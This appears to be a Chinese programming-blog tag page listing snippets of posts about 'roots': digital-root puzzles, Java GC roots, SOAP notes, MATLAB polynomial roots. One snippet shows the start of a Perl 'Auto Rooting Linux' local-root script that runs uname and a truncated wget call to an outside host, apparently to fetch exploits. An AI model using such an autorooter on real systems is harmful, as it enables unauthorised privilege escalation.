E-COM-NET
首页
在线工具
Layui镜像站
SUI文档
联系我们
推荐频道
Java
PHP
C++
C
C#
Python
Ruby
go语言
Scala
Servlet
Vue
MySQL
NoSQL
Redis
CSS
Oracle
SQL Server
DB2
HBase
Http
HTML5
Spring
Ajax
Jquery
JavaScript
Json
XML
NodeJs
mybatis
Hibernate
算法
设计模式
shell
数据结构
大数据
JS
消息中间件
正则表达式
Tomcat
SQL
Nginx
Shiro
Maven
Linux
ROOTS
Problem 003
Answer:6857
roots
= [] product = 1 x = 2 number = input("number?
光在右边
·
2011-06-06 02:41
python
projecteuler
problem
Prime
factor
Problem 003
Answer:6857
roots
= [] product = 1 x = 2 number = input("number?: ") y = number while product !
光在右边
·
2011-06-06 02:41
python
problem
projecteuler
Project
Euler
算法百题005:数字根(Digital
Roots
)
BackgroundThedigitalrootofapositiveintegerisfoundbysummingthedigitsoftheinteger.Iftheresultingvalueisasingledigitthenthatdigitisthedigitalroot.Iftheresultingvaluecontainstwoormoredigits,thosedigitsare
fduan
·
2011-05-10 12:00
算法
String
Integer
iterator
input
output
Ubuntu下Java开发环境一条龙配置策略(续)
*TOxoops_root@localhostIDENTIFIEDBY"654321";这样就建立了一个xoops_
roots
的用户,它对数据库xoops有着全部权限。
hh.凝望
·
2011-04-07 21:00
java
mysql
ubuntu
配置管理
情感
Auto Rooting Linux > Local
Roots
For 2007 / 2008 / 2009 PRV8T
#!/bin/perl #AutoRootingLinux #Byxp #Localroot200720082009forLinuxPriv8 #Usage:perlautoroot.pl #Version:1.0!!! #Note:gcc&wgetCommandmustBeEnabled. # { system("uname-a"); system("wgetwww.tux-
hackfreer
·
2011-04-06 06:07
linux
职场
休闲
Java的几种垃圾回收算法
B:根集(
roots
set)包括: 1.局部变量的对象引用,栈元素以及任何类变量的对象引用。
sundful
·
2011-03-16 16:00
java
jvm
算法
活动
JAVA内存错误实战
1.JAVA堆导致的内存异常 Java堆存放的是对象实例,因此只要不断建立对象,并且保证GC
Roots
到对象之间有可达路径即可产生OOM异常。这是由于内存泄露导致的内存溢出异常。
liulanghan110
·
2011-02-25 15:00
java
spring
多线程
thread
虚拟机
杭电 1013 Digital
Roots
这题嘛,不用多说,难度不大,唯一要注意的,也是ACM经常耍的花招:1000以内的单次输入量。也就是说,它可能输入1000个数字字符,直观点举例,就是:8947129387523745194375983274597435792834527345297349594375972345414132413577230诸如此类。所以必须用字符串来解决。/*THEPROGRAMISMADEBYPYY*//*--
panyanyany
·
2011-02-24 16:00
c
list
Integer
input
each
output
杭电 1013 Digital
Roots
这题嘛,不用多说,难度不大,唯一要注意的,也是ACM经常耍的花招:1000以内的单次输入量。也就是说,它可能输入1000 个数字字符,直观点举例,就是: 8947129387523745194375983274597435792834527345297349594375972345414132413577230 诸如此类。 所以必须用字符串来解决。 /* THE PROGRAM IS MA
txf2004
·
2011-02-24 16:00
root
Java的几种垃圾回收算法
B:根集(
roots
set)包括: 1.局部变量的对象引用,栈元素以及任何类变量的对象引用。
xiangxingchina
·
2010-10-21 23:00
java
jvm
算法
活动
文件夹遍历
import java.util.Scanner;public class ListRoots{ public static File choose(File[]
roots
xwpxcom
·
2010-08-20 10:00
J#
SOAP 学习笔记
基于消息的文档交换和RPC:SOAP在通过HTTP进行同步远程过程调用中有它自己的
roots
,同步RPC,异步的基于消息的文档交换模型。文档交换模型是两个endpoint之间数据交换的一种默认方法。
liuxiIT
·
2010-08-13 18:00
header
serialization
SOAP
encoding
binding
attributes
SOAP 学习笔记
基于消息的文档交换和RPC:SOAP在通过HTTP进行同步远程过程调用中有它自己的
roots
, 同步RPC,异步的基于消息的文档交换模型。
wapysun
·
2010-08-13 18:00
SOAP
类型转换 HDOJ 1013 Digital
Roots
题目如下 http://acm.hdu.edu.cn/showproblem.php?pid=1013 题目分析相当简单,不多说,这里要记录的是一点点小技巧按题目意思,必须要将输入的数字拆分成个位数,然后相加,如果结果是个位数即输入结果,不是则继续拆分 所以这里涉及到,拆分数字。。。 itoa是广泛应用的非标准C语言扩展函数。由于它不是标准C语言函数,所以不能在所有的编译器中使用。但是,大多数的编
huaxiangsl
·
2010-07-20 16:00
c
windows
String
扩展
语言
编译器
类型转换 HDOJ 1013 Digital
Roots
题目如下 http://acm.hdu.edu.cn/showproblem.php?pid=1013 题目分析相当简单,不多说,这里要记录的是一点点小技巧 按题目意思,必须要将输入的数字拆分成个位数,然后相加,如果结果是个位数即输入结果,不是则继续拆分 所以这里涉及到,拆分数字。。。 itoa是广泛应用的非标准C语言扩展函数。由于它不是标准C语言函数,所以不能在所有的编译器
mmdev
·
2010-07-20 16:00
root
java垃圾回收算法
根集(
roots
set) 包括:1.局部变量的对象引用,栈元素以及任何类变量的对象引用 &nbs
huze104
·
2010-06-22 20:00
java
jvm
算法
工作
活动
Java拾遗之常用小程序
使用Java列出本地磁盘的盘符列表关键代码: File[]
roots
=File.listRoots();2.
HeruiUp
·
2010-04-13 10:00
地震预备物品zz
http://www.earthquakecountry.info/
roots
/step3.htmlPreparedisastersupplieskits.
orzorz
·
2010-04-06 14:00
list
each
include
Numbers
Forms
POJ 3175 Finding Bovine
Roots
简单计算
POJ3175FindingBovineRoots简单计算思路:看到这题,第一个想到的方法就是枚举sqrt(2),sqrt(3),sqrt(4)。。,然后sprintf出来,再比较字符串。显然,这种方法比较低级啦。仔细想了下,发现如果x.123...这个数字的平方是一个整数的话,那必然 sqr(x.124)>ceil(sqr(x.123)) [sqr=求平方,ceil=向上取整]所以,就可以从小到
糯米
·
2010-03-18 08:00
Java获取系统硬盘和内存使用情况;
使用类java.io.File1.获取系统硬盘信息:publicstaticStringgetDiskInfo(){StringBuffersb=newStringBuffer();File[]
roots
dhdhdh0920
·
2010-02-09 10:00
java
String
File
磁盘
Those of us who refuse to risk and grow get swallowed up by life
I want to send my
roots
deep into the soil beneath me, and thrust my sprouts through
jiangduxi
·
2010-01-30 08:00
spring
UP
sun
The Root
Let's talk about the
roots
.
tanglei198577
·
2009-12-14 18:00
Go
AIR
HDOJ 1163 Eddy's digital
Roots
[简单数论]
题目描述:求n^n次的digitalroot(数根),例如root(67)=6+7=root(13)=1+3=4;求解思路:现在分析一个问题,假设将十位数为a,个位数为b的一个整数表示为ab,则推导得ab*ab=(a*10+b)*(a*10+b)=100*a*a+10*2*a*b+b*b根据上式可得:root(ab*ab)=a*a+2*a*b+b*b=(a+b)*(a+b);[公式一]同理也可证得
iamskying
·
2009-10-28 16:00
c
如何用Java查看自己各个磁盘的容量
java.io.File; public class RootTest { public static void main(String[] args) { File[]
roots
bestxiaok
·
2009-09-05 09:00
java
jdk
Lisp之根源
原文链接:http://daiyuwen.freeshell.org/gb/rol/
roots
_of_lisp.html 转载原因:此文过于经典,不转太过可惜此文所在的网站的不太稳定,不转有可能想看的人看不到自己学习原文版权归
abruzzi
·
2009-08-25 13:00
编程
C++
c
C#
lisp
多项式方程求根
Matlab函数:r=
roots
(c) 其中c为系数,从高到低。 其他方程求解函数:solvefsolvefminsearch
daiyuchao
·
2009-07-27 09:00
java遍历指定盘符的所有文件和文件夹
importjava.io.File;importjava.util.Scanner;publicclassListRoots{publicstaticFilechoose(File[]
roots
){Scannersc
chenzhehui
·
2009-04-14 23:00
java
String
File
Class
import
java遍历系统所有文件和文件夹
importjava.io.File;publicclassListRoot{publicstaticvoidmain(String[]args){//获取系统根File[]
roots
=File.listRoots
chenzhehui
·
2009-04-14 22:00
MATLAB多项式应用
第八章多項式之應用對於多項式MATLAB也提供許多指令可供運算,相關的指令如下表:函數名稱說明conv(p,q)兩多項式相乘[q,r]=deconv(num,den)兩多項式相除,q為商,r為餘數,num分子,den為分母
roots
Augusdi
·
2009-04-10 20:00
MATLAB多项式应用
第八章多項式之應用對於多項式MATLAB也提供許多指令可供運算,相關的指令如下表:函數名稱說明conv(p,q)兩多項式相乘[q,r]=deconv(num,den)兩多項式相除,q為商,r為餘數,num分子,den為分母
roots
Augusdi
·
2009-04-10 20:00
function
table
matlab
fun
output
plot
hdu 1013 Digital
Roots
http://acm.hdu.edu.cn/showproblem.php?pid=1013#includeint main(){ char tp[1001]; while(scanf("%s",tp)!=EOF) { int sum=0; char *p=tp; if(strcmp(tp,"0")==0)
Dreams
·
2009-04-04 10:00
090306 Exercise 1.8 cube-root procedures
Newton's method for cube
roots
is based on the fact that if y is an approximation to the cube
lzj520
·
2009-03-06 16:00
procedure
090306 Exercise 1.6 Square
Roots
by Newton's Method
090306Exercise1.6SquareRootsbyNewton'sMethodExercise1.6. AlyssaP.Hackerdoesn'tseewhyifneedstobeprovidedasaspecialform.``Whycan'tIjustdefineitasanordinaryprocedureintermsofcond?''sheasks.Alyssa'sfriend
stargazers
·
2009-03-06 15:00
获取系统盘符
class FileRoots { /** * @param args */ public static void main(String[] args) { File[]
roots
avery_leo
·
2008-11-25 13:00
java
ACM 1519 Digital
Roots
很贱的一道题。。。我本来以为可以随便水的。。。结果还是WA了几次输入的数居然可能是N千位。。。所以只能以字符串输入了后面还看到个小技巧,如2位数ab,a+b=a*10+b-9*10=ab%9#include #include #include #include #include using namespace std;int sum;void digsum(string& s){ sum=0
啥也别说了
·
2008-11-15 16:00
HDU 1013 Digital
Roots
题意描述:求正整数各位数字的和的各位数字的和的各位数字的和......直到所求结果为个位数。例如:12,1+2=3,3是个位数,所以12的DigitalRoots是3,再如39,3+9=12,12不是个位数,继续计算1+2=3,3是个位数,故3为39的DigitalRoots。题目比较简单,贴下代码。当时排第一。【code】main(i,m){chars[999];while(gets(s)&&
lin_miao0818
·
2008-08-25 18:00
HDU1163 Eddy's digital
Roots
HDU1163 Eddy'sdigitalRoots题意描述:输入数据n(0~10000之间),要求输出n^n的各位数字之和的各位数字之和的各位数字之和......一直求到所得结果为个位数为止。方法一:先考虑两位数ab*ab=(a*10+b)*(a*10+b)=a*a*100+2*a*b*10+b*b,其各位数字之和等于a*a+2*a*b+b*b各位数字之和=(a+b)*(a+b),若a+b还
lin_miao0818
·
2008-08-25 00:00
c
ini
ZOJ 1115 - Digital
Roots
1 /* Accepted 1115 C++ 00:00.01 856K */ 2 #include 3 #include 4 5 using namespace std; 6 7 int main() 8 { 9 string num;10 while((cin >> num) && num != "0")11 {12 int sum = 0;1
superman
·
2008-04-04 22:00
分硬币问题的递归解法
class Coin { private static int[] coins = {25,10,5,1}; private static Stack<Integer>
roots
metaphy
·
2008-02-17 13:00
算法
草根seo实验室谈草根的起源
陆谷孙主编的《英汉大辞典》把grass-
roots
单列为一个词条,释义是:①群众的,基层的;②乡村地区的;③基础的;根本的。
myhrnet
·
2007-11-12 18:06
seo
职场
休闲
草根
实验室
1519 Digital
Roots
DigitalRootsTimeLimit:1000MS MemoryLimit:10000KTotalSubmissions:8060 Accepted:2891DescriptionThedigitalrootofapositiveintegerisfoundbysummingthedigitsoftheinteger.Iftheresultingvalueisasingledigitthen
xcl119xcl
·
2007-10-15 08:00
ACM PKU 1519 Digital
Roots
简单隐藏陷阱
ACMPKU1519DigitalRoots简单隐藏陷阱http://acm.pku.edu.cn/JudgeOnline/problem?id=1519一看这道题就笑了,呵呵,能这么简单?这不是侮辱我的智商么?五分钟之内完成代码如下: 1#include"stdio.h" 2void main() 3{ 4 int n; 5 int root; 6 while(scanf("%
AClayton's ACM/ICPC Life 只切菜题 菜鸟乱飞
·
2007-09-16 04:00
Jane Eyre (3 of 231)
spent some three minutes in thrusting out his tongue at me as far as he could without damaging the
roots
cary1130
·
2007-05-09 22:00
windows
UP
idea
Go
Jane Eyre (3 of 231)
spent some three minutes in thrusting out his tongue at me as far as he could without damaging the
roots
cary1130
·
2007-05-09 22:00
windows
UP
idea
Go
学习Java6(三) 磁盘空间统计
java.io.File; 2 3 public class SpaceChecker { 4 public static void main(String[] args) { 5 File[]
roots
交口称赞
·
2007-01-03 09:00
Newton's method for cube
roots
Newton'smethodforcuberootsExercise1.8. Newton'smethodforcuberootsisbasedonthefactthatifyisanapproximationtothecuberootofx,thenabetterapproximationisgivenbythevalue
ivaneeo's blog
·
2006-07-30 10:00
初学jsp写的一个显示系统目录文件的小程序
td,select,input,body { font-size:9pt; }JspFileSystemViewer"); sb.append(
roots
[i]+" ");
yyzhpq
·
2004-09-24 09:00
C++
c
jsp
windows
C#
初学jsp写的一个显示系统目录文件的小程序
td,select,input,body{font-size:9pt;}JspFileSystemViewer");sb.append(
roots
[i]+" ");}returnsb.toString
fanjava
·
2004-09-24 09:00
C++
c
jsp
windows
C#
初学jsp写的一个显示系统目录文件的小程序
td,select,input,body { font-size:9pt; }JspFileSystemViewer"); sb.append(
roots
[i]+" ");
roruby
·
2004-09-24 09:00
C++
c
jsp
windows
C#
上一页
7
8
9
10
11
12
13
14
下一页
按字母分类:
A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z
其他